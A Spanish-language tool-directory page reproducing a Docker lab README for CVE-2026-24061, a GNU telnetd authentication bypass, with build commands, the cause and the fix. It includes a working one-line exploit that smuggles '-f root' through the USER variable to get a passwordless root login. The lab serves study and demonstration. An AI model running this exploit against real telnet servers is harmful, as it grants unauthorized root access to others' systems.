Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/gabs-hub/cve-2026-24061_lab
Análisis de VulnerabilidadesExplotaciónAutenticaciónAprendizaje y EducaciónLabs y Práctica
GitHubgabs-hub/cve-2026-24061_lab

CVE-2026-24061_Lab

# Laboratorio educativo de Docker que demuestra CVE-2026-24061, una omisión de autenticación en GNU telnetd que permite acceso root mediante inyección de argumentos en la variable de entorno USER.

Ver Repositorio
hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-24061 Telnetd Lab

Este repositorio contiene un laboratorio simple en Docker para demostrar la vulnerabilidad CVE-2026-24061. Permite eludir la autenticación y obtener acceso como root en GNU telnetd, en Linux.

El objetivo es exclusivamente educativo.

Requisitos

  • Docker instalado
  • Cliente Telnet instalado

Construcción de la imagen

root@kitploit:~
docker build -t cve-2026-24061 .

Ejecución del contenedor

root@kitploit:~
docker run -it -p 2323:23 cve-2026-24061

Explotación

En otra terminal, ejecute:

root@kitploit:~
USER="-f root" telnet -a localhost 2323

Después de esto, el acceso se concederá directamente como root, sin solicitud de contraseña.

Observaciones

  • El contenedor utiliza una versión vulnerable de GNU inetutils telnetd
  • El servicio Telnet no debe exponerse en entornos reales
  • Utilice este laboratorio solo para estudio y demostración

¿Cómo funciona la vulnerabilidad?

La falla ocurre debido a una inyección de argumentos durante la invocación de la utilidad /usr/bin/login. El telnetd construye dinámicamente la línea de comandos utilizada para llamar a login e incluye el valor de la variable de entorno USER mediante el marcador de posición %U, sin ninguna sanitización.

Como la utilidad login acepta la opción -f, que ignora la autenticación por contraseña, un atacante puede definir USER="-f root" y forzar el inicio de sesión directo como root.

Como el telnetd se ejecuta con privilegios elevados, esta manipulación resulta inmediatamente en una shell root sin necesidad de credenciales válidas. La explotación es simple, no requiere interacción previa y puede automatizarse fácilmente, lo que justifica la puntuación CVSS 9.8.

La vulnerabilidad fue corregida con la introducción de validación y sanitización de la variable USER, bloqueando valores que comienzan con guion y caracteres especiales, impidiendo la inyección de argumentos en login.

Descargar herramienta